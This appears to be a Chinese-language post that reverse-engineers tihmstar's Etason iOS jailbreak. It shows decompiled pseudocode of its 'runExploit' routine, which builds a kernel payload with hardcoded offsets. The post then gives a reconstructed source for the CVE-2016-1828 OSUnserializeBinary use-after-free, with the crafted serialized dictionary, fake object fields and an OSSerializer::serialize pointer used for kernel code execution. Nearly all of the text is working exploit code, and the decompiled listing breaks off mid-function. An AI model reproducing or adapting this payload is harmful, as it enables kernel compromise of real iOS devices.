if (((r0 ^ 0xffffffff) & 0x1) != 0x0) {
r0 = __assert_rtn("runExploit", "/Users/tihmstar/dev/Etason JB/Etason JB/exploit.m", 0x1c9, "pthread_create(&insert_payload_thread, NULL, &insert_payload, args) == 0");
}
else {
while (arg_114 == 0x12345678) {
}
_logToFile("payload ptr: %p\n", arg_114, 0xdb29, r3, STK-1);
r0 = sleep(0x1);
arg_120 = *(int8_t *)0x15030;
arg_121 = *(int8_t *)0x15031;
arg_122 = *(int8_t *)0x15032;
arg_123 = *(int8_t *)0x15033;
arg_110 = 0x4;
arg_5C = r0;
*0x4 = 0x81000010;
arg_110 = 0x4;
if (_is_841_system() != 0x0) {
*(&arg_120 + arg_110) = 0x8000004;
arg_110 = 0x8000008;
*(&arg_120 + arg_110) = 0x327973;
arg_110 = 0x327977;
*(&arg_120 + arg_110) = 0x9000004;
arg_110 = 0x9000008;
*(&arg_120 + arg_110) = 0x327973;
arg_110 = 0x327977;
*(&arg_120 + arg_110) = 0xc000001;
arg_110 = 0xc000005;
*(&arg_120 + arg_110) = 0xb000001;
arg_110 = 0xb000005;
*(&arg_120 + arg_110) = 0xc000001;
arg_110 = 0xc000005;
}
else {
*(&arg_120 + arg_110) = 0x9000004;
arg_110 = 0x9000008;
*(&arg_120 + arg_110) = 0x327973;
arg_110 = 0x327977;
}
*(&arg_120 + arg_110) = 0xa000014;
arg_110 = 0xa000018;
*(&arg_120 + arg_110) = 0x8 + arg_114 + 0xffffffb4;
arg_110 = arg_110 + 0x4;
*(&arg_120 + arg_110) = 0x41414141;
arg_110 = 0x41414145;
*(&arg_120 + arg_110) = arg_114 + 0xffffffb4;
arg_110 = arg_110 + 0x4;
r2 = arg_110;
*(&arg_120 + r2) = 0x14;
arg_110 = 0x18;
arg_58 = arg_11C;
*(arg_110 + &arg_120) = 0x1 + _find_OSSerializer_serialize() + arg_58;
arg_110 = arg_110 + 0x4;
r0 = _is_841_system();
lr = &arg_120;
r1 = 0x2;
COND = r0 == 0x0;
r0 = 0x0;
asm{ };
if (!COND) {
r0 = 0x1;
}
asm{ };
if ((r0 & 0x1) == 0x0) {
r1 = 0x1;
}
感謝 Tihmstar 大神，雖然你不提供原始碼，但我仍然可以把它還原成原始碼。
PS：漏洞的寫法應該如下：
// CVE-2016-1828
memcpy(data, kOSSerializeBinarySignature, sizeof(kOSSerializeBinarySignature));
bufpos += sizeof(kOSSerializeBinarySignature);
WRITE_IN(data, kOSSerializeDictionary | kOSSerializeEndCollecton | 0x10);
WRITE_IN(data, kOSSerializeSymbol | 4);
WRITE_IN(data, 0x00327973); // "sy2"
/* our key is a OSString object that will be freed */
WRITE_IN(data, kOSSerializeString | 4);
WRITE_IN(data, 0x00327973); // irrelevant
/* now this will free the string above */
WRITE_IN(data, kOSSerializeObject | 1); // ref to "sy2"
WRITE_IN(data, kOSSerializeBoolean | 1); // lightweight value
/* and this is the key for the value below */
WRITE_IN(data, kOSSerializeObject | 1); // ref to "sy2" again
WRITE_IN(data, kOSSerializeData | 0x14);
WRITE_IN(data, payload_ptr+PAYLOAD_TO_PEXPLOIT+PEXPLOIT_TO_UAF_PAYLOAD); // [00] address of uaf_payload_buffer
WRITE_IN(data, 0x41414141); // [04] dummy
WRITE_IN(data, payload_ptr+PAYLOAD_TO_PEXPLOIT); // [08] address of uaf_payload_buffer - 8
WRITE_IN(data, 0x00000014); // [0C] static value of 20
WRITE_IN(data, kernel_base+find_OSSerializer_serialize()+1); // [10] address of OSSerializer::serialize (+1)
/* now create a reference to object 1 which is the OSString object that was just freed */
WRITE_IN(data, kOSSerializeObject | kOSSerializeEndCollecton | 1 或 2);
後面還有內容，但分析不出來。
但是目前越獄也沒用：Cydia bug 一堆，更新後 APP 消失，越獄了根本不能用。